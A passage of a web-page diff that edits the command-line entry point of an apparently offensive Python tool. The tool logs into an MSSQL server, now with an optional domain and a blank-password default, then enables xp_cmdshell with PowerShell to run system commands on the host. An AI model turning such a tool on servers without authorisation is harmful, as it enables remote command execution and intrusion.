return XpShell(ms_sql)
|
return XpShell(ms_sql)
|
||||||
else:
|
else:
|
||||||
@ -167,12 +167,13 @@ if __name__ == '__main__':
|
|||||||
|
|
||||||
parser = argparse.ArgumentParser(description="Connect to mssql server using username, password, and hostname.")
|
parser = argparse.ArgumentParser(description="Connect to mssql server using username, password, and hostname.")
|
||||||
parser.add_argument('-u', '--username', required=True, help="Username for the server")
|
parser.add_argument('-u', '--username', required=True, help="Username for the server")
|
||||||
parser.add_argument('-p', '--password', required=True, help="Password for the server")
|
parser.add_argument('-p', '--password', required=False, default="", help="Password for the server")
|
||||||
parser.add_argument('-H', '--hostname', required=True, help="Hostname or IP address of the server")
|
parser.add_argument('-H', '--hostname', required=True, help="Hostname or IP address of the server")
|
||||||
|
parser.add_argument('-d', '--domain', required=False, default=None, help="Domain the user belongs to")
|
||||||
args = parser.parse_args()
|
args = parser.parse_args()
|
||||||
|
|
||||||
# if connection successful
|
# if connection successful
|
||||||
xp_shell = connect_mssql(args.hostname, username=args.username, password=args.password)
|
xp_shell = connect_mssql(args.hostname, username=args.username, password=args.password, domain=args.domain)
|
||||||
if isinstance(xp_shell, XpShell):
|
if isinstance(xp_shell, XpShell):
|
||||||
xp_shell.do_enable_xp_cmdshell()
|
xp_shell.do_enable_xp_cmdshell()
|
||||||
xp_shell.pwsh = True
|
xp_shell.pwsh = True
|
||||||
|
Loading…
Reference in New Issue
Block a user